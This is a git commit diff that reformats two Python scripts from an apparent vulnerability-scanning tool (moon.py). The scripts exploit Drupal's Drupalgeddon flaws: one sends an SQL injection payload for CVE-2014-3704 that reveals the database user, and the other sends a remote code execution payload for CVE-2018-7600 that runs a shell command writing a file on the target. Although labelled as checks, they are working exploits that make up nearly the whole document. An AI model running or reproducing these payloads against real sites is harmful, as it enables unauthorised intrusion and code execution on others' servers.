fix
This commit is contained in:
rpkr
@@ -1,8 +1,6 @@
|
|||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from bs4 import BeautifulSoup
|
from bs4 import BeautifulSoup
|
||||||
import requests
|
import requests
|
||||||
import re
|
|
||||||
|
|
||||||
'''
|
'''
|
||||||
Usage:
|
Usage:
|
||||||
@@ -10,27 +8,28 @@ Usage:
|
|||||||
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
|
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
|
||||||
'''
|
'''
|
||||||
|
|
||||||
|
|
||||||
def attack(URL):
|
def attack(URL):
|
||||||
url = URL+'/?q=node&destination=node'
|
url = URL+'/?q=node&destination=node'
|
||||||
print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||||
|
|
||||||
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
||||||
Content_Type="application/x-www-form-urlencoded"
|
Content_Type = "application/x-www-form-urlencoded"
|
||||||
headers={"User-Agent":user_agent,"Content-Type":Content_Type}
|
headers = {"User-Agent":user_agent,"Content-Type":Content_Type}
|
||||||
|
|
||||||
data ='pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
||||||
try:
|
try:
|
||||||
r = requests.post(url,data=data, headers=headers, verify=False)
|
r = requests.post(url,data=data, headers=headers, verify=False)
|
||||||
soup=BeautifulSoup(r.content,"lxml")
|
soup = BeautifulSoup(r.content,"lxml")
|
||||||
print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
|
print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
|
||||||
print('--------------------')
|
print('--------------------')
|
||||||
print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
|
print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
|
||||||
print('--------------------')
|
print('--------------------')
|
||||||
except:
|
except Exception:
|
||||||
print('someerror!')
|
print('someerror!')
|
||||||
print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||||
print('\n')
|
print('\n')
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
attack()
|
attack()
|
||||||
|
|
||||||
|
|||||||
@@ -7,9 +7,11 @@ Usage:
|
|||||||
moon.py -u drupal http://127.0.0.1:8080
|
moon.py -u drupal http://127.0.0.1:8080
|
||||||
Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
|
Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
|
||||||
'''
|
'''
|
||||||
|
|
||||||
|
|
||||||
def attack(URL):
|
def attack(URL):
|
||||||
print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||||
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
||||||
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
|
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
|
||||||
# print(url)
|
# print(url)
|
||||||
try:
|
try:
|
||||||
@@ -18,11 +20,11 @@ def attack(URL):
|
|||||||
if check.status_code != 200:
|
if check.status_code != 200:
|
||||||
sys.exit("Not exploitable")
|
sys.exit("Not exploitable")
|
||||||
print('error!')
|
print('error!')
|
||||||
print ('可能存在漏洞-Check: '+ URL +'/hello.txt ^w^')
|
print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^')
|
||||||
except:
|
except:
|
||||||
print('someerroe!')
|
print('someerroe!')
|
||||||
print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||||
print('\n')
|
print('\n')
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
attack()
|
attack()
|
||||||
|
|||||||
Reference in New Issue
Block a user